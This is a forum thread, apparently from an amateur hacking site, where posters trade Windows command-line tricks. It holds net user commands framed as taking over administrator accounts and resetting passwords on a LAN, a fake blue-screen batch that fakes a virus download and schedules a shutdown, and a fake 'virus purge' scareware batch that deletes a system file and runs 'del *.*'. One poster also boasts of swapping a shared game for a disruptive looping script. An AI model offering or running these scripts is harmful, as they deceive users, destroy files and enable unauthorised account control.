CMD
-
- Posts: 1
- Joined: Sun Dec 07, 2008 8:39 pm
-
- Posts: 205
- Joined: Sat Nov 29, 2008 3:19 am
I HAve something for All of us
how to hack the admin
In CMD type
net user "DesiredUsername" /add
without ""
then to make it admin type
net localgroups administrators "username" /add
without ""
to change its password type
net user username *
then you will ask for password
then you can change the password of any LAN
how to hack the admin
In CMD type
net user "DesiredUsername" /add
without ""
then to make it admin type
net localgroups administrators "username" /add
without ""
to change its password type
net user username *
then you will ask for password
then you can change the password of any LAN
Mess With The Best, Die Like The Rest!
-
- Posts: 205
- Joined: Sat Nov 29, 2008 3:19 am
Re: heh
Lol. Just. Lol.a-sharp wrote:Kiyka wrote:All time favorite CMD code.
net user
net user <admin's name> *
password
password
exit
<3
What if you dont have the Admin power
you can still change it????
There is a way, you can copy the admin's login over. But I shall not be sharing this piece of information ^-^. This is a hacking site, and cracking is not wanted.
See through the master
Become the master
Become the master
- PaRaDoX
- Posts: 708
- Joined: Fri Aug 22, 2008 5:52 am
- Location: In your fridge, waiting to pop out and scare you.
Re: heh
lol, funny how if you're a hacker, you always have the potential to be a cracker.......God must hate us, sending so many noobs lol.S3th wrote:Lol. Just. Lol.a-sharp wrote:Kiyka wrote:All time favorite CMD code.
net user
net user <admin's name> *
password
password
exit
<3
What if you dont have the Admin power
you can still change it????
There is a way, you can copy the admin's login over. But I shall not be sharing this piece of information ^-^. This is a hacking site, and cracking is not wanted.
To S3th:
^_^ my favourite is the simple batch that makes an un protected CMD before login with system persmissions (lol above admin, quite godly indeed as far as CMD goes)
"delete explorer.exe"
^_^

~You are a glitch in my reasoning.
Re: heh
I think I have tried that before (:P) the batch file, where it loads CMD outside of the system without the restrictions? It can access things that even admin cannot?PaRaDoX wrote:lol, funny how if you're a hacker, you always have the potential to be a cracker.......God must hate us, sending so many noobs lol.S3th wrote:Lol. Just. Lol.a-sharp wrote:
What if you dont have the Admin power
you can still change it????
There is a way, you can copy the admin's login over. But I shall not be sharing this piece of information ^-^. This is a hacking site, and cracking is not wanted.
To S3th:
^_^ my favourite is the simple batch that makes an un protected CMD before login with system persmissions (lol above admin, quite godly indeed as far as CMD goes)
"delete explorer.exe"
^_^
See through the master
Become the master
Become the master
-
- Posts: 205
- Joined: Sat Nov 29, 2008 3:19 am
Re: heh
Or if your using Vista, then you can activate the "System Administrator" on and use that account to have unrestricted rights.S3th wrote:I think I have tried that before (:P) the batch file, where it loads CMD outside of the system without the restrictions? It can access things that even admin cannot?PaRaDoX wrote:lol, funny how if you're a hacker, you always have the potential to be a cracker.......God must hate us, sending so many noobs lol.S3th wrote: Lol. Just. Lol.
There is a way, you can copy the admin's login over. But I shall not be sharing this piece of information ^-^. This is a hacking site, and cracking is not wanted.
To S3th:
^_^ my favourite is the simple batch that makes an un protected CMD before login with system persmissions (lol above admin, quite godly indeed as far as CMD goes)
"delete explorer.exe"
^_^

The Assistant of the Clan. The White Orders.
- PaRaDoX
- Posts: 708
- Joined: Fri Aug 22, 2008 5:52 am
- Location: In your fridge, waiting to pop out and scare you.
Re: heh
Indeed. It runs with system permissions (higher than admin, it's the computer itself)S3th wrote:I think I have tried that before (:P) the batch file, where it loads CMD outside of the system without the restrictions? It can access things that even admin cannot?PaRaDoX wrote:lol, funny how if you're a hacker, you always have the potential to be a cracker.......God must hate us, sending so many noobs lol.S3th wrote: Lol. Just. Lol.
There is a way, you can copy the admin's login over. But I shall not be sharing this piece of information ^-^. This is a hacking site, and cracking is not wanted.
To S3th:
^_^ my favourite is the simple batch that makes an un protected CMD before login with system persmissions (lol above admin, quite godly indeed as far as CMD goes)
"delete explorer.exe"
^_^
be careful, you can really fuck things up with this ^_^

~You are a glitch in my reasoning.
Well, i wrote a batch file too open 6 sites, when they close open 6 new.. over and over.. i replaced a game wich is shared thrugh all computers with this, it was really fun watching :p
The whole "system" is a number of people creating a code all together, this code loops and is there for a "system".
System Zero could also be confirmed with one word "Hacker's"
System Zero could also be confirmed with one word "Hacker's"
-
- Posts: 7
- Joined: Tue Sep 08, 2009 2:00 pm
- Location: Some where in the matrix
Blue ScreeN
run cmd.
EdIt/H
appear blue screen
Type:
@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause >nul
cls
echo Downloading viruses . . .
ping localhost -n 5 >nul
dir /s
pause >nul
shutdown -s -t 120 -c "Your computer has committed suicide, have a nice day."
EdIt/H
appear blue screen
Type:
@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause >nul
cls
echo Downloading viruses . . .
ping localhost -n 5 >nul
dir /s
pause >nul
shutdown -s -t 120 -c "Your computer has committed suicide, have a nice day."
-
- Posts: 7
- Joined: Tue Sep 08, 2009 2:00 pm
- Location: Some where in the matrix
Dont try This At You Computer
@echo OFF
echo This program will purge any ak$327 viruses on your computer.
echo SEARCHing (lots of text, may take a while, just
echo wait, will beep when finished.)
pause
cd C:\
dir /s
echo
echo
echo
echo Done searching, PRESS ENTER or RETURN KEY TO DISPLAY
pause>nul
echo Displaying infected files
echo Files infected with ak$327:
echo short full
echo 1:pacerprf.ini displaying on next line
echo Full path:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
echo 2:memtest.exe C:\Windows\Boot\PCAT\memtest.exe
pause
echo WARNING
echo MEMTEST.EXE WILL PERMENENTLY DELETE YOUR
echo SYSTEM ON A SPECIFIED DATE!
ECHO DELETE IMMEDIATLY, OR LET ME!
echo close now if you want to delete it yourself.
echo otherwise press space
echo note to please run this on an ADMINISTRATOR account.
pause>nul
echo Confirm if prompted by pressing y then enter or return........
del C:\Windows\Boot\PCAT\memtest.exe
Pause
echo thanks for using this program, please delete this too:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
pause@echo off
del *.*
echo This program will purge any ak$327 viruses on your computer.
echo SEARCHing (lots of text, may take a while, just
echo wait, will beep when finished.)
pause
cd C:\
dir /s
echo
echo
echo
echo Done searching, PRESS ENTER or RETURN KEY TO DISPLAY
pause>nul
echo Displaying infected files
echo Files infected with ak$327:
echo short full
echo 1:pacerprf.ini displaying on next line
echo Full path:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
echo 2:memtest.exe C:\Windows\Boot\PCAT\memtest.exe
pause
echo WARNING
echo MEMTEST.EXE WILL PERMENENTLY DELETE YOUR
echo SYSTEM ON A SPECIFIED DATE!
ECHO DELETE IMMEDIATLY, OR LET ME!
echo close now if you want to delete it yourself.
echo otherwise press space
echo note to please run this on an ADMINISTRATOR account.
pause>nul
echo Confirm if prompted by pressing y then enter or return........
del C:\Windows\Boot\PCAT\memtest.exe
Pause
echo thanks for using this program, please delete this too:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
pause@echo off
del *.*